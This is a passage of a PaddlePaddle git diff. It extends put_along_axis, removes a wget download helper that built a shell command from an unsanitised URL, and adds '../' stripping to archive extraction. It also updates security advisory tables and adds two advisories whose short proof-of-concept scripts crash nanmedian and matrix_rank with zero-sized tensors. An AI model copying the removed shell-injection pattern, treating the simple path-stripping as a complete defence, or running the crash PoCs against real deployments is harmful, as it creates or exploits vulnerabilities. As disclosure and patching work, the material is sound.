-                if child.weight_quanter.scales() is None:
+                if child.converted:
+                    continue
+                if (
+                    child.weight_quanter is None
+                    or child.weight_quanter.scales() is None
+                ):
                     continue
                 child._convert(remain_weight=remain_weight)
             elif isinstance(child, BaseQuanter):
diff --git a/python/paddle/tensor/manipulation.py b/python/paddle/tensor/manipulation.py
index 87cb258952f9e4..d8ee8698e2d70e 100644
--- a/python/paddle/tensor/manipulation.py
+++ b/python/paddle/tensor/manipulation.py
@@ -5308,11 +5308,12 @@ def put_along_axis(
     Args:
         arr (Tensor) : The Destination Tensor. Supported data types are float32 and float64.
         indices (Tensor) : Indices to put along each 1d slice of arr. This must match the dimension of arr,
-            and need to broadcast against arr. Supported data type are int and int64.
+            and need to broadcast against arr if broadcast is 'True'. Supported data type are int and int64.
+        values (Tensor) : The value element(s) to put. The data types should be same as arr.
         axis (int) : The axis to put 1d slices along.
-        reduce (str, optional): The reduce operation, default is 'assign', support 'add', 'assign', 'mul' and 'multiply'.
-        include_self (bool, optional): whether to reduce with the elements of arr. (Only support True now)
-        broadcast (bool, optional): whether to broadcast indices.
+        reduce (str, optional): The reduce operation, default is 'assign', support 'add', 'assign', 'mul', 'multiply', "mean", "amin" and "amax".
+        include_self (bool, optional): whether to reduce with the elements of arr, default is 'True'.
+        broadcast (bool, optional): whether to broadcast indices, default is 'True'.
 
     Returns:
         Tensor, The indexed element, same dtype with arr
@@ -5332,9 +5333,45 @@ def put_along_axis(
             [[99, 99, 99],
              [60, 40, 50]])
 
+            >>> index = paddle.zeros((2,2)).astype("int32")
+            >>> value=paddle.to_tensor([[1,2],[3,4]]).astype(x.dtype)
+            >>> result = paddle.put_along_axis(x, index, value, 0, "add", True, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[14, 36, 20],
+             [60, 40, 50]])
+
+            >>> result = paddle.put_along_axis(x, index, value, 0, "mul", True, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[30 , 240, 20 ],
+             [60 , 40 , 50 ]])
+
+            >>> result = paddle.put_along_axis(x, index, value, 0, "mean", True, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[4 , 12, 20],
+             [60, 40, 50]])
+
+            >>> result = paddle.put_along_axis(x, index, value, 0, "amin", True, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[1 , 2 , 20],
+             [60, 40, 50]])
+
+            >>> result = paddle.put_along_axis(x, index, value, 0, "amax", True, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[10, 30, 20],
+             [60, 40, 50]])
+
+            >>> result = paddle.put_along_axis(x, index, value, 0, "add", False, False)
+            >>> print(result)
+            Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True,
+            [[4 , 6 , 20],
+             [60, 40, 50]])
+
     """
-    if not include_self:
-        raise ValueError("`include_self` is only support True now.")
     if len(arr.shape) != len(indices.shape):
         raise ValueError(
             "`indices` and `arr` must have the same number of dimensions!"
@@ -5381,7 +5418,15 @@ def put_along_axis(
                 )
             )
     if in_dynamic_or_pir_mode():
-        return _C_ops.put_along_axis(arr, indices, values, axis, reduce)
+        if convert_dtype(indices.dtype) not in ['int32', 'int64']:
+            raise TypeError(
+                "The data type of indices should be one of ['int32', 'int64'], but got {}".format(
+                    str(convert_dtype(indices.dtype))
+                )
+            )
+        return _C_ops.put_along_axis(
+            arr, indices, values, axis, reduce, include_self
+        )
     else:
         check_variable_and_dtype(
             arr,
@@ -5400,20 +5445,27 @@ def put_along_axis(
         check_variable_and_dtype(
             indices, 'index', ['int32', 'int64'], 'put_along_axis'
         )
+        check_type(include_self, 'include_self', bool, 'put_along_axis')
         helper = LayerHelper('put_along_axis', **locals())
         dtype = helper.input_dtype()
         result = helper.create_variable_for_type_inference(dtype)
         helper.append_op(
             type="put_along_axis",
             inputs={"Input": arr, "Index": indices, "Value": values},
-            attrs={"Axis": axis, "Reduce": reduce},
+            attrs={
+                "Axis": axis,
+                "Reduce": reduce,
+                "Include_self": include_self,
+            },
             outputs={"Result": result},
         )
         return result
 
 
 @inplace_apis_in_dygraph_only
-def put_along_axis_(arr, indices, values, axis, reduce='assign'):
+def put_along_axis_(
+    arr, indices, values, axis, reduce='assign', include_self=True
+):
     r"""
     Inplace version of ``put_along_axis`` API, the output Tensor will be inplaced with input ``arr``.
     Please refer to :ref:`api_paddle_put_along_axis`.
@@ -5432,7 +5484,9 @@ def put_along_axis_(arr, indices, values, axis, reduce='assign'):
     if broadcast_shape:
         indices = paddle.broadcast_to(indices, broadcast_shape)
     values = paddle.broadcast_to(values, indices.shape)
-    return _C_ops.put_along_axis_(arr, indices, values, axis, reduce)
+    return _C_ops.put_along_axis_(
+        arr, indices, values, axis, reduce, include_self
+    )
 
 
 def index_add(x, index, axis, value, name=None):
diff --git a/python/paddle/utils/cpp_extension/extension_utils.py b/python/paddle/utils/cpp_extension/extension_utils.py
index e64f5e6a25b3f6..2ebff3f5cf25de 100644
--- a/python/paddle/utils/cpp_extension/extension_utils.py
+++ b/python/paddle/utils/cpp_extension/extension_utils.py
@@ -1326,6 +1326,7 @@ def _jit_compile(file_path, verbose=False):
     """
     Build shared library in subprocess
     """
+    assert os.path.exists(file_path)
     ext_dir = os.path.dirname(file_path)
     setup_file = os.path.basename(file_path)
 
diff --git a/python/paddle/utils/download.py b/python/paddle/utils/download.py
index b9ca1f35976c63..de1c36bdddfab1 100644
--- a/python/paddle/utils/download.py
+++ b/python/paddle/utils/download.py
@@ -16,12 +16,10 @@
 import os
 import os.path as osp
 import shutil
-import subprocess
 import sys
 import tarfile
 import time
 import zipfile
-from urllib.parse import urlparse
 
 import httpx
 
@@ -197,39 +195,7 @@ def _get_download(url, fullname):
         return False
 
 
-def _wget_download(url: str, fullname: str):
-    try:
-        assert urlparse(url).scheme in (
-            'http',
-            'https',
-        ), 'Only support https and http url'
-        # using wget to download url
-        tmp_fullname = fullname + "_tmp"
-        # –user-agent
-        command = f'wget -O {tmp_fullname} -t {DOWNLOAD_RETRY_LIMIT} {url}'
-        subprc = subprocess.Popen(
-            command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
-        )
-        _ = subprc.communicate()
-
-        if subprc.returncode != 0:
-            raise RuntimeError(
-                f'{command} failed. Please make sure `wget` is installed or {url} exists'
-            )
-
-        shutil.move(tmp_fullname, fullname)
-
-    except Exception as e:  # requests.exceptions.ConnectionError
-        logger.info(f"Downloading {url} failed with exception {str(e)}")
-        return False
-
-    return fullname
-
-
-_download_methods = {
-    'get': _get_download,
-    'wget': _wget_download,
-}
+_download_methods = {'get': _get_download}
 
 
 def _download(url, path, md5sum=None, method='get'):
@@ -311,7 +277,10 @@ def _decompress(fname):
 
 def _uncompress_file_zip(filepath):
     with zipfile.ZipFile(filepath, 'r') as files:
-        file_list = files.namelist()
+        file_list_tmp = files.namelist()
+        file_list = []
+        for file in file_list_tmp:
+            file_list.append(file.replace("../", ""))
 
         file_dir = os.path.dirname(filepath)
 
@@ -340,7 +309,13 @@ def _uncompress_file_zip(filepath):
 
 def _uncompress_file_tar(filepath, mode="r:*"):
     with tarfile.open(filepath, mode) as files:
-        file_list = files.getnames()
+        file_list_tmp = files.getnames()
+        file_list = []
+        for file in file_list_tmp:
+            assert (
+                file[0] != "/"
+            ), f"uncompress file path {file} should not start with /"
+            file_list.append(file.replace("../", ""))
 
         file_dir = os.path.dirname(filepath)
 
diff --git a/security/README.md b/security/README.md
index 01559632d7dd45..7a1c6df5a5f7a5 100644
--- a/security/README.md
+++ b/security/README.md
@@ -7,12 +7,30 @@ We regularly publish security advisories about using PaddlePaddle.
 *Note*: In conjunction with these security advisories, we strongly encourage PaddlePaddle users to read and understand PaddlePaddle's security model as outlined in [SECURITY.md](../SECURITY.md).
 
 
-| Advisory Number                              | Type                                                 | Versions affected | Reported by                                                      | Additional Information |
-|----------------------------------------------|------------------------------------------------------|:-----------------:|------------------------------------------------------------------|------------------------|
-| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py                           |      < 2.5.0      | Xiaochen Guo from Huazhong University of Science and Technology  |                        |
-| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace                 |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip              |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window |    = 2.4.0-rc0    | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree                              |       < 2.4       | Wang Xuan(王旋) of Qihoo 360 AIVul Team                            |                        |
+| Advisory Number                              | Type                                                 | Versions affected | Reported by                                                     | Additional Information |
+|----------------------------------------------|------------------------------------------------------|:-----------------:|-----------------------------------------------------------------|------------------------|
+| [PDSA-2023-023](./advisory/pdsa-2023-023.md) | Command injection in convert_shape_compare           |      < 2.6.0      | leeya_bug                                                       |                        |
+| [PDSA-2023-022](./advisory/pdsa-2023-022.md) | FPE in paddle.argmin and paddle.argmax               |      < 2.6.0      | Peng Zhou (zpbrent) from Shanghai University                    |                        |
+| [PDSA-2023-021](./advisory/pdsa-2023-021.md) | Null pointer dereference in paddle.crop              |      < 2.6.0      | Peng Zhou (zpbrent) from Shanghai University                    |                        |
+| [PDSA-2023-020](./advisory/pdsa-2023-020.md) | Command injection in _wget_download                  |      < 2.6.0      | huntr.com                                                       |                        |
+| [PDSA-2023-019](./advisory/pdsa-2023-019.md) | Command injection in get_online_pass_interval        |      < 2.6.0      | huntr.com and leeya_bug                                         |                        |
+| [PDSA-2023-018](./advisory/pdsa-2023-018.md) | Heap buffer overflow in paddle.repeat_interleave     |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-017](./advisory/pdsa-2023-017.md) | FPE in paddle.amin                                   |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-016](./advisory/pdsa-2023-016.md) | Stack overflow in paddle.linalg.lu_unpack            |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-015](./advisory/pdsa-2023-015.md) | FPE in paddle.lerp                                   |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-014](./advisory/pdsa-2023-014.md) | FPE in paddle.topk                                   |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-013](./advisory/pdsa-2023-013.md) | Stack overflow in paddle.searchsorted                |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-012](./advisory/pdsa-2023-012.md) | Segfault in paddle.put_along_axis                    |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-011](./advisory/pdsa-2023-011.md) | Null pointer dereference in paddle.nextafter         |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-010](./advisory/pdsa-2023-010.md) | Segfault in paddle.mode                              |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-009](./advisory/pdsa-2023-009.md) | FPE in paddle.linalg.eig                             |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-008](./advisory/pdsa-2023-008.md) | Segfault in paddle.dot                               |      < 2.6.0      | Tong Liu of CAS-IIE                                             |                        |
+| [PDSA-2023-007](./advisory/pdsa-2023-007.md) | FPE in paddle.linalg.matrix_rank                     |      < 2.6.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2023-006](./advisory/pdsa-2023-006.md) | FPE in paddle.nanmedian                              |      < 2.6.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py                           |      < 2.5.0      | Xiaochen Guo from Huazhong University of Science and Technology |                        |
+| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace                 |      < 2.5.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip              |      < 2.5.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window |    = 2.4.0-rc0    | Tong Liu of ShanghaiTech University                             |                        |
+| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree                              |       < 2.4       | Wang Xuan(王旋) of Qihoo 360 AIVul Team                           |                        |
diff --git a/security/README_cn.md b/security/README_cn.md
index 49223df8844f39..7022221643a429 100644
--- a/security/README_cn.md
+++ b/security/README_cn.md
@@ -4,15 +4,33 @@
 
 
 
-注：我们非常建议飞桨用户阅读和理解[SECURITY_cn.md](../SECURITY_cn.md)所介绍的飞桨安全模型，以便更好地了解此安全公告。
+*注*：我们非常建议飞桨用户阅读和理解[SECURITY_cn.md](../SECURITY_cn.md)所介绍的飞桨安全模型，以便更好地了解此安全公告。
 
 
-| 安全公告编号                                          | 类型                                                   |    受影响版本     | 报告者                                                             | 备注 |
-|-------------------------------------------------|------------------------------------------------------|:------------:|-----------------------------------------------------------------|----|
-| [PDSA-2023-005](./advisory/pdsa-2023-005_cn.md) | Command injection in fs.py                           |   < 2.5.0    | Xiaochen Guo from Huazhong University of Science and Technology |    |
-| [PDSA-2023-004](./advisory/pdsa-2023-004_cn.md) | FPE in paddle.linalg.matrix_power                    |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
-| [PDSA-2023-003](./advisory/pdsa-2023-003_cn.md) | Heap buffer overflow in paddle.trace                 |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
-| [PDSA-2023-002](./advisory/pdsa-2023-002_cn.md) | Null pointer dereference in paddle.flip              |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
-| [PDSA-2023-001](./advisory/pdsa-2023-001_cn.md) | Use after free in paddle.diagonal                    |   < 2.5.0    | Tong Liu of ShanghaiTech University                             |    |
-| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0  | Tong Liu of ShanghaiTech University                             |    |
-| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree                              |    < 2.4     | Wang Xuan(王旋) of Qihoo 360 AIVul Team                           |    |
+| 安全公告编号                                          | 类型                                                   |    受影响版本    | 报告者                                                             | 备注 |
+|-------------------------------------------------|------------------------------------------------------|:-----------:|-----------------------------------------------------------------|----|
+| [PDSA-2023-023](./advisory/pdsa-2023-023_cn.md) | Command injection in convert_shape_compare           |   < 2.6.0   | leeya_bug                                                       |    |
+| [PDSA-2023-022](./advisory/pdsa-2023-022_cn.md) | FPE in paddle.argmin and paddle.argmax               |   < 2.6.0   | Peng Zhou (zpbrent) from Shanghai University                    |    |
+| [PDSA-2023-021](./advisory/pdsa-2023-021_cn.md) | Null pointer dereference in paddle.crop              |   < 2.6.0   | Peng Zhou (zpbrent) from Shanghai University                    |    |
+| [PDSA-2023-020](./advisory/pdsa-2023-020_cn.md) | Command injection in _wget_download                  |   < 2.6.0   | huntr.com                                                       |    |
+| [PDSA-2023-019](./advisory/pdsa-2023-019_cn.md) | Command injection in get_online_pass_interval        |   < 2.6.0   | huntr.com and leeya_bug                                         |    |
+| [PDSA-2023-018](./advisory/pdsa-2023-018_cn.md) | Heap buffer overflow in paddle.repeat_interleave     |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-017](./advisory/pdsa-2023-017_cn.md) | FPE in paddle.amin                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-016](./advisory/pdsa-2023-016_cn.md) | Stack overflow in paddle.linalg.lu_unpack            |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-015](./advisory/pdsa-2023-015_cn.md) | FPE in paddle.lerp                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-014](./advisory/pdsa-2023-014_cn.md) | FPE in paddle.topk                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-013](./advisory/pdsa-2023-013_cn.md) | Stack overflow in paddle.searchsorted                |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-012](./advisory/pdsa-2023-012_cn.md) | Segfault in paddle.put_along_axis                    |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-011](./advisory/pdsa-2023-011_cn.md) | Null pointer dereference in paddle.nextafter         |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-010](./advisory/pdsa-2023-010_cn.md) | Segfault in paddle.mode                              |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-009](./advisory/pdsa-2023-009_cn.md) | FPE in paddle.linalg.eig                             |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-008](./advisory/pdsa-2023-008_cn.md) | Segfault in paddle.dot                               |   < 2.6.0   | Tong Liu of CAS-IIE                                             |    |
+| [PDSA-2023-007](./advisory/pdsa-2023-007_cn.md) | FPE in paddle.linalg.matrix_rank                     |   < 2.6.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-006](./advisory/pdsa-2023-006_cn.md) | FPE in paddle.nanmedian                              |   < 2.6.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-005](./advisory/pdsa-2023-005_cn.md) | Command injection in fs.py                           |   < 2.5.0   | Xiaochen Guo from Huazhong University of Science and Technology |    |
+| [PDSA-2023-004](./advisory/pdsa-2023-004_cn.md) | FPE in paddle.linalg.matrix_power                    |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-003](./advisory/pdsa-2023-003_cn.md) | Heap buffer overflow in paddle.trace                 |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-002](./advisory/pdsa-2023-002_cn.md) | Null pointer dereference in paddle.flip              |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2023-001](./advisory/pdsa-2023-001_cn.md) | Use after free in paddle.diagonal                    |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University                             |    |
+| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree                              |    < 2.4    | Wang Xuan(王旋) of Qihoo 360 AIVul Team                           |    |
diff --git a/security/README_ja.md b/security/README_ja.md
index 4bd0b984c5834c..2711a91396b5e5 100644
--- a/security/README_ja.md
+++ b/security/README_ja.md
@@ -7,12 +7,30 @@ PaddlePaddle の使用に関するセキュリティ勧告を定期的に発表
 *注*: これらのセキュリティ勧告と併せ、PaddlePaddle ユーザーには [SECURITY.md](../SECURITY_ja.md) に記載されている PaddlePaddle のセキュリティモデルを読み、理解することを強くお勧めします。
 
 
-| アドバイザリー番号                              | タイプ                                                 | 対象バージョン | 報告者                                                      | 追加情報 |
-|----------------------------------------------|------------------------------------------------------|:-----------------:|------------------------------------------------------------------|------------------------|
-| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py                           |      < 2.5.0      | Xiaochen Guo from Huazhong University of Science and Technology  |                        |
-| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace                 |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip              |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal                    |      < 2.5.0      | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window |    = 2.4.0-rc0    | Tong Liu of ShanghaiTech University                              |                        |
-| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree                              |       < 2.4       | Wang Xuan(王旋) of Qihoo 360 AIVul Team                            |                        |
+| アドバイザリー番号                                    | タイプ                                                  |   対象バージョン   | 報告者                                                             | 追加情報 |
+|----------------------------------------------|------------------------------------------------------|:-----------:|-----------------------------------------------------------------|------|
+| [PDSA-2023-023](./advisory/pdsa-2023-023.md) | Command injection in convert_shape_compare           |   < 2.6.0   | leeya_bug                                                       |      |
+| [PDSA-2023-022](./advisory/pdsa-2023-022.md) | FPE in paddle.argmin and paddle.argmax               |   < 2.6.0   | Peng Zhou (zpbrent) from Shanghai University                    |      |
+| [PDSA-2023-021](./advisory/pdsa-2023-021.md) | Null pointer dereference in paddle.crop              |   < 2.6.0   | Peng Zhou (zpbrent) from Shanghai University                    |      |
+| [PDSA-2023-020](./advisory/pdsa-2023-020.md) | Command injection in _wget_download                  |   < 2.6.0   | huntr.com                                                       |      |
+| [PDSA-2023-019](./advisory/pdsa-2023-019.md) | Command injection in get_online_pass_interval        |   < 2.6.0   | huntr.com and leeya_bug                                         |      |
+| [PDSA-2023-018](./advisory/pdsa-2023-018.md) | Heap buffer overflow in paddle.repeat_interleave     |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-017](./advisory/pdsa-2023-017.md) | FPE in paddle.amin                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-016](./advisory/pdsa-2023-016.md) | Stack overflow in paddle.linalg.lu_unpack            |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-015](./advisory/pdsa-2023-015.md) | FPE in paddle.lerp                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-014](./advisory/pdsa-2023-014.md) | FPE in paddle.topk                                   |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-013](./advisory/pdsa-2023-013.md) | Stack overflow in paddle.searchsorted                |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-012](./advisory/pdsa-2023-012.md) | Segfault in paddle.put_along_axis                    |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-011](./advisory/pdsa-2023-011.md) | Null pointer dereference in paddle.nextafter         |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-010](./advisory/pdsa-2023-010.md) | Segfault in paddle.mode                              |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-009](./advisory/pdsa-2023-009.md) | FPE in paddle.linalg.eig                             |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-008](./advisory/pdsa-2023-008.md) | Segfault in paddle.dot                               |   < 2.6.0   | Tong Liu of CAS-IIE                                             |      |
+| [PDSA-2023-007](./advisory/pdsa-2023-007.md) | FPE in paddle.linalg.matrix_rank                     |   < 2.6.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2023-006](./advisory/pdsa-2023-006.md) | FPE in paddle.nanmedian                              |   < 2.6.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py                           |   < 2.5.0   | Xiaochen Guo from Huazhong University of Science and Technology |      |
+| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power                    |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace                 |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip              |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal                    |   < 2.5.0   | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University                             |      |
+| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree                              |    < 2.4    | Wang Xuan(王旋) of Qihoo 360 AIVul Team                           |      |
diff --git a/security/advisory/pdsa-2023-004_cn.md b/security/advisory/pdsa-2023-004_cn.md
index c31c4da4f8728f..11f22a45aca11c 100644
--- a/security/advisory/pdsa-2023-004_cn.md
+++ b/security/advisory/pdsa-2023-004_cn.md
@@ -6,7 +6,7 @@ CVE-2023-38672
 
 ### 影响
 
-当张量包含纬度值为0的情况，`paddle.linalg.matrix_power`会触发除0异常，导致程序运行时崩溃，PoC代码如下：
+当张量包含维度值为0的情况，`paddle.linalg.matrix_power`会触发除0异常，导致程序运行时崩溃，PoC代码如下：
 
 ```python
 import paddle
diff --git a/security/advisory/pdsa-2023-006.md b/security/advisory/pdsa-2023-006.md
new file mode 100644
index 00000000000000..4997760cd5000a
--- /dev/null
+++ b/security/advisory/pdsa-2023-006.md
@@ -0,0 +1,31 @@
+## PDSA-2023-006: FPE in paddle.nanmedian
+
+### CVE Number
+
+CVE-2023-38674
+
+### Impact
+
+When `x` dim calculates `stride` to 0, `paddle.nanmedian` triggers FPE by `numel / stride`. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32)
+x = paddle.to_tensor(x)
+paddle.nanmedian(x)
+```
+
+### Patches
+
+We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.
diff --git a/security/advisory/pdsa-2023-006_cn.md b/security/advisory/pdsa-2023-006_cn.md
new file mode 100644
index 00000000000000..e8ac803c033d6a
--- /dev/null
+++ b/security/advisory/pdsa-2023-006_cn.md
@@ -0,0 +1,31 @@
+## PDSA-2023-006: FPE in paddle.nanmedian
+
+### CVE编号
+
+CVE-2023-38674
+
+### 影响
+
+当由`x`的dim计算的`stride`为0时，`paddle.nanmedian`会由`numel / stride`触发除0异常，PoC代码如下：
+
+```python
+import paddle
+import numpy as np
+
+x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32)
+x = paddle.to_tensor(x)
+paddle.nanmedian(x)
+```
+
+### 补丁
+
+我们在commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1)中对此问题进行了补丁。
+修复将包含在飞桨2.6.0版本当中。
+
+### 更多信息
+
+请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。
+
+### 贡献者
+
+此漏洞由 Tong Liu of ShanghaiTech University 提交。
diff --git a/security/advisory/pdsa-2023-007.md b/security/advisory/pdsa-2023-007.md
new file mode 100644
index 00000000000000..f61223193cabfe
--- /dev/null
+++ b/security/advisory/pdsa-2023-007.md
@@ -0,0 +1,31 @@
+## PDSA-2023-007: FPE in paddle.linalg.matrix_rank
+
+### CVE Number
+
+CVE-2023-38675
+
+### Impact
+
+When `x` dim calculates `rows` or `cols` to 0, `paddle.linalg.matrix_rank` triggers FPE by `numel / (rows * cols)`. The PoC is as follows:
+
+```python
+import paddle
+import numpy as np
+
+x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32)
+x = paddle.to_tensor(x)
+paddle.linalg.matrix_rank(x)
+```
+
+### Patches
+
+We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1).
+The fix will be included in PaddlePaddle 2.6.0.
+
+### For more information
+
+Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+
+This vulnerability has been reported by Tong Liu of ShanghaiTech University.
diff --git a/security/advisory/pdsa-2023-007_cn.md b/security/advisory/pdsa-2023-007_cn.md
new file mode 100644
index 00000000000000..0572aa1767b36d
--- /dev/null
